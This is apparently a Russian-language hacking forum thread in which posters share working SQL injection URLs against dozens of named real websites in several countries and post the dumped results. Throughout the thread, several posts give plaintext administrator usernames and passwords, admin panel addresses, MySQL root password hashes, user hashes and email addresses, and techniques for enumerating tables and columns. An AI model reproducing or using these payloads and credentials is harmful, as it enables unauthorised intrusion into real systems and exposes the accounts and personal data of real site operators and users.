SQL Инъекции

http://www.prosambo.com/index.php?razdel=news&id=-51+union+select+1,2,3,4,5,6,7/*
5.0.45
----------------------------------------------------------------------
http://inforos.ru/?idth=-21+union+select+1/*
5.0.45-log
http://inforos.ru/?idth=-21+union+select+concat(login,0x3a,pass)+from+inforos_manager+limit+0,1/*
----------------------------------------------------------------------
http://www.infoshos.ru/?idn=9999+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2/*
5.0.45
----------------------------------------------------------------------
http://www.amur-trassa.ru/?id=-15+union+select+1,2,3,4,5,6,7,8/*
5.0.45
----------------------------------------------------------------------
http://www.abelmot.ru/?module=catalog&c_id=-2+union+select+1,2,table_name,4,5,6+from+information_schema.tables/*
5.0.45

 

http://www.tvaparecida.com.br/

Code:

http://www.tvaparecida.com.br/programas.php?id=-1+union+select+1,concat_ws(0x3a,USERNAME,USERPASS,EMAIL),3,4+from+TB_LOGIN+limit+0,1/*

http://www.ibict.br/

Code:

http://www.ibict.br/noticia.php?id=-1+union+select+convert(version()+using+latin1),2/*

 

Code:

http://www.wcasi.com/programs.php?id=-9+union+select+1,2,3,VERSION(),5,6,7,8,9,10,11,12/*

Code:

http://www.ssuexed.com/programs.php?id=-112+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9+from+users/*

 

а это что -

 

http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+1,2/*

 

sql

так навскидку видно, что есть кое-чего -

 

http://www.pitty.com.br/

Code:

http://www.pitty.com.br/blog.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version(),data   base()),4,5/*

http://www.undime.org.br/

Code:

http://www.undime.org.br/htdocs/index.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

http://www.fesppr.br/

Code:

http://www.fesppr.br/cient/publicacoes.php?id=-1'+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4+from+admin/*

 

http://www.propertysaleorrent.ie/

Code:

http://www.propertysaleorrent.ie/detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+admin/*

Админка: http://www.propertysaleorrent.ie/admin/

login: chamlis
pass: amalkne

http://www.chambers.ie/

Code:

http://www.chambers.ie/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+admin/*

Админка: http://www.chambers.ie/admins/

Админов аж 19 штук)))

» caoimhe : policy
» anna : letannain
» pauline : polexecpa
» grainne.oreilly : merrion
» RMM : goodRMM07
» ciara : watercress
» brett : bw325815
» susan : corppatrons
» marion : offmancsp
» richard : headcsp
» kate : projects
» barry : projects2
» Megan : commercial
» james.dunne : teddyBear
» jessica : jdempsey
» AMAS : amas07
» james : jkiernan
» annmcarroll : cahercon
» support : secureRMM07

http://www.explore.ie/

Code:

http://www.explore.ie/ireland/article.php?ID=-1+union+select+concat_ws(0x3a,user(),version(),database())/*

вывод в тайтле

http://www.andrewmoore.ie/

От этого сайта просто в восторге) долго искал, где же выводятся данные, оказалось в текстовом поле "Message:" в ссылке в ее параметре id=.

Code:

http://www.andrewmoore.ie/friend.php?id=-1+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin/*

Админка: http://www.andrewmoore.ie/admin/

login: andrewmoore
pass: 194rew803

http://www.camping-ireland.ie/

Code:

http://www.camping-ireland.ie/caravan-parks/camping.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database())+from+admin/*

для тех, кто подберет колонки, админка: http://www.camping-ireland.ie/caravan-parks/login.html

 

2Loker

Code:

http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71),2/**

4.1.18:battle8i@localhost:battle8

 

sql

Saint-Sky Loker

и тем не менее такая таблица с полями там есть... (попробуй другие названия таблиц и полей, и ощути разницу) и именно 6, а не -6, т.к. не будет видно отличий (отсутствует вывод таблицы). Так что я бы посоветовал посимвольный перебор, но в версиях < 4.1 не поддерживаются подзапросы...

ку?

 

Saint-Sky
я так думаю, это говорит о том, что обе эти таблицы есть, но из articles есть прямой вывод, а из users - нет.

http://battle8.hip-hop.ru/index.php?mode=articles&id=6+union+select+1,2+from+users/* - есть вывод статьи
http://battle8.hip-hop.ru/index.php?mode=articles&id=6+union+select+1,2+from+articles/* - есть вывод статьи

http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+1,2+from+users/* - нет вывода инфы из таблицы
http://battle8.hip-hop.ru/index.php?mode=articles&id=-6+union+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,count(id)),0x71),0x71),2+from+articles/* - есть вывод инфы из таблицы

 

http://www.rakurs.com/?news_id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary))/*

4.1.10a/rakurs/rakurs@localhost
-----------------------------------------------------------------------------

region-plus.tv


http://www.region-plus.tv/index.php?c=3socium&n=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/*

5.0.41-community/region_base2/region_admin@localhost


http://www.region-plus.tv/index.php?c=3socium&n=-1+union+select+1,2,concat_ws(0x2F,username,password,email),4,5,6+from+forums_auth+limit+0,1/*

логин/хеш/мейл
io/6e5149991a779b92918203cc28078fbd/[email protected]



http://www.region-plus.tv/index.php?c=3socium&n=-1+union+select+1,2,concat_ws(0x2F,login,password),4,5,6+from+newsmaker+limit+0,1/*

логин/хеш
BIG/3f604f988c27002e752fe43822e0741d

 

http://www.ninsis.ru/newsview.php?id=-1'+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6/*

4.1.22-log/dbninsis/root@localhost


http://www.ninsis.ru/newsview.php?id=-1'+union+select+1,concat_ws(0x2F,user,password),3,4,5,6+from+mysql.user/*

root/*1B8D4E3A1CCB31B260088B7C11FD37BC79A35EE3

 

sao.mos.ru

HTML:

http://sao.mos.ru/?r=13&id=2376+union+select+0,1,2,3,4,5/*

HTML:

http://sao.mos.ru/?r=13&id=2376+union+select+0,concat(USER(),VERSION(),DATABASE()),2,3,4,5/*

USER:sao1@chicken
VERSION:4.1.12
DATABASE:sao_pref

Есть таблица user

HTML:

http://sao.mos.ru/?r=13&id=2376+union+select+0,1,2,3,4,5+from+user/*

 

ruvr.ru


http://www.ruvr.ru/main.php?lng=rus&q=54970&cid=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user())/*&p=30.12.2007

5.0.41-log/ruvr/root@localhost


все таблицы, где есть столбец “password”
http://www.ruvr.ru/main.php?lng=rus&q=54970&cid=-1+union+select+1,2,3,concat(table_name,0x3b,table_schema)+from+information_schema.columns+where+column_name=0x70617373776F7264/*&p=30.12.2007

user_auth;cacti
user;mysql
mybb_forums;phpbb_es
mybb_users;phpbb_es
punbb_users;phpbb_es
u_users;phpbb_es


http://www.ruvr.ru/main.php?lng=rus&q=54970&cid=-1+union+select+1,2,3,concat_ws(0x2F,user,password)+from+mysql.user/*&p=30.12.2007

root/*F063FF97347E5D3E80B937BCA217308BF22D6E88


http://www.ruvr.ru/main.php?lng=rus&q=54970&cid=-1+union+select+1,2,3,concat_ws(0x2F,username,password,salt,email)+from+phpbb_es.mybb_users+limit+0,1/*&p=30.12.2007

логин/хеш/соль/мейл
adv/c6e9d9efbd87fdce20a3e3009294e109/S11C7Ufl/[email protected]

 

http://www.churchilltrust.com.au/

Code:

http://www.churchilltrust.com.au/content.php?id=-1+union+select+1,2,3,convert(concat_ws(0x3a,username,password)+using+latin1),5,6,7,8,9,10,11+from+users/*

admin:4dm1n

http://www.mgnsw.org.au/

Code:

http://www.mgnsw.org.au/museums_and_galleries.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6/*

 

Прикольный вывод )))
код:

http://www.auto-dom.ru/mlink.cgi?type=0&id=-50+union+select+cast(version()+as+binary),3/*

 

transport-ua.com


http://www.transport-ua.com/news.php?rub=5&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,version(),database(),user())/*

5.0.45-log/transport/jsu75bfLnf@localhost



http://www.transport-ua.com/news.php?rub=5&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,login,password,email_1)+from+users/*

логин/хеш/мейл
valentina/0af870403b703b423aa901e1220bbfcf/[email protected]



http://www.transport-ua.com/news.php?rub=5&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2F,login,password,email)+from+client/*

логин/пароль/мейл
89152/vladimir/[email protected]

 

http://www.mid.dj/ Официальный сайт министерства внутренних дел, судя по .dj - это Республика Джибути)))))) Для тех кто не знает - Восточная Африка=))))))

Code:

http://www.mid.dj/lireArticleid.php?id=-1+union+select+convert(concat_ws(0x3a,user(),version(),database())+using+latin1),2,3/*

http://www.booking.dj/ Сайт какого-то диджея...логин и пасс меня убивают....

Code:

http://www.booking.dj/artist.php?id=-4'+union+select+1,concat_ws(0x3a,login,pass),3,4,5,6+from+admins/*

admin:123

 

Code:

http://www.cbdc.ca/programs.php?id=-10+union+select+1,VERSION(),3,4+from+accounts/*

Code:

http://www.asiandetours.com/programs.php?id=999999+union+select+1,concat(status,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*

Code:

http://www.equinection.org/programs.php?id=-36+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*

Code:

http://cae.nsu.ru/programs.php?id=-3+union+select+1,2,VERSION(),4,5,6,7,8/*